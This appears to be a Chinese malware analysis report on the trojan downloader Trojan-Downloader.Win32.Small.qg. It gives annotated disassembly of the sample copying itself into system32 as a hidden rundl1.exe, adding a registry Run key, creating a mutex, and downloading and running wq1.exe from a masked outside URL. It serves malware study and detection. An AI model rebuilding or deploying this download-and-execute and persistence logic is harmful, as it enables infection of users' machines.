一、病毒标签:
病毒名称: Trojan-Downloader.Win32.Small.qg(卡巴)
病毒类型: 下载者
文件SHA1: d8a14e669243b960e749421d7ec8119cecc49258
危害等级: 3
文件长度: 脱壳前1,968 字节,脱壳后5,280 字节
受影响系统:Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG 1.33 -> dulek/xt
二、病毒描述:
复制自身到系统目录并修改注册表实现自启动，然后从指定地址下载文件并执行。
三、行为分析:
1、打开自身文件并读取
seg001:00401152 push eax ; lpFileName
seg001:00401153 call CreateFileA ; 打开自身文件
seg001:00401159 push 2 ; dwMoveMethod
seg001:0040115B push esi ; lpDistanceToMoveHigh
seg001:0040115C push 0FFFFFF60h ; lDistanceToMove
seg001:00401161 push eax ; hFile
seg001:00401162 mov [ebp+hObject], eax
seg001:00401165 call SetFilePointer
seg001:0040116B lea eax, [ebp+dwDisposition]
seg001:0040116E push esi ; lpOverlapped
seg001:0040116F mov ebx, 0A0h
seg001:00401174 push eax ; lpNumberOfBytesRead
seg001:00401175 mov edi, offset byte_401518
seg001:0040117A push ebx ; nNumberOfBytesToRead
seg001:0040117B push edi ; lpBuffer
seg001:0040117C push [ebp+hObject] ; hFile
seg001:0040117F call ReadFile ; 读文件
2、检测系统版本。
seg001:00401195 call GetVersion ; 检测系统版本
seg001:0040119B test eax, eax
seg001:0040119D jge short loc_4011C9
seg001:0040119F push offset LibFileName ; "kernel32.dll"
seg001:004011A4 call LoadLibraryA ; win9X下跳到这里注册服务
seg001:004011AA push offset ProcName ; "RegisterServiceProcess"
seg001:004011AF push eax ; hModule
seg001:004011B0 mov dword_4015C0, eax
seg001:004011B5 call GetProcAddress
seg001:004011BB cmp eax, esi
seg001:004011BD mov dword_4015BC, eax
3、修改注册表键值。
seg001:004011D4 push eax ; lpBuffer
seg001:004011D5 call GetSystemDirectoryA ; 系统目录
seg001:004011DB mov edi, lstrcatA
seg001:004011E1 lea eax, [ebp+FileName]
seg001:004011E7 push offset String2 ; "\"
seg001:004011EC push eax ; lpString1
seg001:004011ED call edi ; lstrcatA
seg001:004011EF lea eax, [ebp+FileName]
seg001:004011F5 push offset byte_40159A ; lpString2
seg001:004011FA push eax ; lpString1
seg001:004011FB call edi ; lstrcatA ; C:\WINDOWS\system32\rundl1.exe
seg001:004011FD lea eax, [ebp+dwDisposition]
seg001:00401200 mov ebx, 80000002h
seg001:00401205 push eax ; lpdwDisposition
seg001:00401206 lea eax, [ebp+hKey]
seg001:00401209 push eax ; phkResult
seg001:0040120A push esi ; lpSecurityAttributes
seg001:0040120B push 0F003Fh ; samDesired
seg001:00401210 push esi ; dwOptions
seg001:00401211 push esi ; lpClass
seg001:00401212 push esi ; Reserved
seg001:00401213 push offset SubKey ; SOFTWARE\Microsoft\Windows\CurrentVersion\Run
seg001:00401218 push ebx ; hKey
seg001:00401219 call RegCreateKeyExA ; 创建注册表
seg001:0040121F lea eax, [ebp+FileName]
seg001:00401225 push eax ; lpString
seg001:00401226 call lstrlenA
seg001:0040122C push eax ; cbData
seg001:0040122D lea eax, [ebp+FileName]
seg001:00401233 push eax ; lpData
seg001:00401234 push 1 ; dwType
seg001:00401236 push esi ; Reserved
seg001:00401237 push offset ValueName ; lpValueName
seg001:0040123C push [ebp+hKey] ; hKey
seg001:0040123F call RegSetValueExA ; 设置键值RUN DLL,指向C:\WINDOWS\system32\rundl1.exe
seg001:00401245 push [ebp+hKey] ; hKey
seg001:00401248 call RegCloseKey
seg001:0040124E lea eax, [ebp+hKey]
seg001:00401251 push eax ; phkResult
seg001:00401252 push offset pszSubKey ; "Software\\wbd"
seg001:00401257 push ebx ; hKey
seg001:00401258 call RegOpenKeyA
seg001:0040125E push [ebp+hKey] ; hKey
seg001:00401261 mov [ebp+hObject], eax
seg001:00401264 call RegCloseKey
seg001:0040126A cmp [ebp+hObject], esi
seg001:0040126D jz loc_40134C
seg001:00401273 lea eax, [ebp+hKey]
seg001:00401276 mov dword ptr [ebp+Type], esi
seg001:00401279 push eax ; phkResult
seg001:0040127A push offset pszSubKey ; "Software\\wbd"
seg001:0040127F push ebx ; hKey
seg001:00401280 mov [ebp+cbData], 4
seg001:00401287 call RegCreateKeyA ; 创建注册表项Software\wbd
seg001:0040128D push [ebp+cbData] ; cbData
seg001:00401290 lea eax, [ebp+Type]
seg001:00401293 push eax ; lpData
seg001:00401294 push 4 ; dwType
seg001:00401296 push esi ; Reserved
seg001:00401297 push offset aHttpkb1 ; "httpkb1"
seg001:0040129C push [ebp+hKey] ; hKey
seg001:0040129F call RegSetValueExA ; 设置键值 httpkb1
seg001:004012A5 push [ebp+hKey] ; hKey
seg001:004012A8 call RegCloseKey
seg001:004012AE lea eax, [ebp+ExistingFileName]
seg001:004012B4 push 104h ; nSize
seg001:004012B9 push eax ; lpFilename
seg001:004012BA push esi ; hModule
seg001:004012BB call GetModuleFileNameA
seg001:004012C1 lea eax, [ebp+FileName]
seg001:004012C7 push 104h ; uSize
seg001:004012CC push eax ; lpBuffer
seg001:004012CD call GetSystemDirectoryA
seg001:004012D3 lea eax, [ebp+FileName]
seg001:004012D9 push offset String2 ; "\"
seg001:004012DE push eax ; lpString1
seg001:004012DF call edi ; lstrcatA
seg001:004012E1 lea eax, [ebp+FileName]
seg001:004012E7 push offset byte_40159A ; lpString2
seg001:004012EC push eax ; lpString1
seg001:004012ED call edi ; lstrcatA
seg001:004012EF lea eax, [ebp+FileName]
seg001:004012F5 push esi ; bFailIfExists
seg001:004012F6 push eax ; lpNewFileName
seg001:004012F7 lea eax, [ebp+ExistingFileName]
seg001:004012FD push eax ; lpExistingFileName
seg001:004012FE call CopyFileA ; 复制自身到系统目录下
seg001:00401304 lea eax, [ebp+FileName]
seg001:0040130A push 2 ; dwFileAttributes
seg001:0040130C push eax ; lpFileName
seg001:0040130D call SetFileAttributesA ; 设置隐藏属性
seg001:00401313 push 11h
seg001:00401315 xor eax, eax
seg001:00401317 pop ecx
seg001:00401318 lea edi, [ebp+StartupInfo]
seg001:0040131B rep stosd
seg001:0040131D lea eax, [ebp+ProcessInformation]
seg001:00401320 mov [ebp+StartupInfo.cb], 44h
seg001:00401327 push eax ; lpProcessInformation
seg001:00401328 lea eax, [ebp+StartupInfo]
seg001:0040132B push eax ; lpStartupInfo
seg001:0040132C push esi ; lpCurrentDirectory
seg001:0040132D push esi ; lpEnvironment
seg001:0040132E push 28h ; dwCreationFlags
seg001:00401330 push esi ; bInheritHandles
seg001:00401331 push esi ; lpThreadAttributes
seg001:00401332 push esi ; lpProcessAttributes
seg001:00401333 lea eax, [ebp+FileName]
seg001:00401339 push esi ; lpCommandLine
seg001:0040133A push eax ; lpApplicationName
seg001:0040133B mov [ebp+StartupInfo.wShowWindow], si
seg001:0040133F call CreateProcessA ; 创建进程
seg001:00401345 push esi ; uExitCode
seg001:00401346 call ExitProcess ; 退出
4、创建互斥体itiswbd。
seg001:0040134C loc_40134C: ; CODE XREF: start+155 j
seg001:0040134C push offset Name ; "itiswbd"
seg001:00401351 push 1 ; bInitialOwner
seg001:00401353 push esi ; lpMutexAttributes
seg001:00401354 call CreateMutexA ; 创建互斥体itiswbd
seg001:0040135A call GetLastError
seg001:00401360 cmp eax, 0B7h
seg001:00401365 jnz short loc_40136E
seg001:00401367 push esi ; uExitCode
seg001:00401368 call ExitProcess
5、检测是否联网，是则执行下载。
seg001:0040144D call InternetGetConnectedState ; 检测是否联网
seg001:00401453 test eax, eax
seg001:00401455 jz loc_401505 ; 不是就跳走
seg001:0040145B cmp dword_4015B8, esi
seg001:00401461 jz loc_4014F9
seg001:00401467 lea eax, [ebp+CmdLine]
seg001:0040146D push eax ; lpBuffer
seg001:0040146E push 104h ; nBufferLength
seg001:00401473 call GetTempPathA ; 临时路径
seg001:00401479 lea eax, [ebp+CmdLine]
seg001:0040147F push offset aWq1_exe ; "wq1.exe"
seg001:00401484 push eax ; lpString1
seg001:00401485 call lstrcatA
seg001:0040148B push esi ; LPBINDSTATUSCALLBACK
seg001:0040148C lea eax, [ebp+CmdLine]
seg001:00401492 push esi ; DWORD
seg001:00401493 push eax ; LPCSTR
seg001:00401494 push offset byte_401518 ; LPCSTR
seg001:00401499 push esi ; LPUNKNOWN
seg001:0040149A call URLDownloadToFileA ; http://www.XXXX.com/wq1.exe
seg001:0040149A ; 执行下载到临时路径目录
seg001:0040149F lea eax, [ebp+CmdLine]
seg001:004014A5 push esi ; uCmdShow
seg001:004014A6 push eax ; lpCmdLine
seg001:004014A7 mov [ebp+hKey], esi
seg001:004014AA call WinExec
seg001:004014B0 cmp eax, 1Fh
seg001:004014B3 mov dword ptr [ebp+Data], eax
seg001:004014B6 jbe short loc_4014F9
seg001:004014B8 lea eax, [ebp+hKey]
seg001:004014BB mov dword ptr [ebp+Data], 1
seg001:004014C2 push eax ; phkResult
seg001:004014C3 push offset pszSubKey ; "Software\\wbd"
seg001:004014C8 push 80000002h ; hKey
seg001:004014CD mov dword_4015B8, esi
seg001:004014D3 call RegCreateKeyA ; Software\wbd
seg001:004014D9 lea eax, [ebp+Data]
seg001:004014DC push 4 ; cbData
seg001:004014DE push eax ; lpData
seg001:004014DF push 4 ; dwType
seg001:004014E1 push esi ; Reserved
seg001:004014E2 push offset aHttpkb1 ; "httpkb1"
seg001:004014E7 push [ebp+hKey] ; hKey
seg001:004014EA call RegSetValueExA ; httpkb1
seg001:004014F0 push [ebp+hKey] ; hKey
seg001:004014F3 call RegCloseKey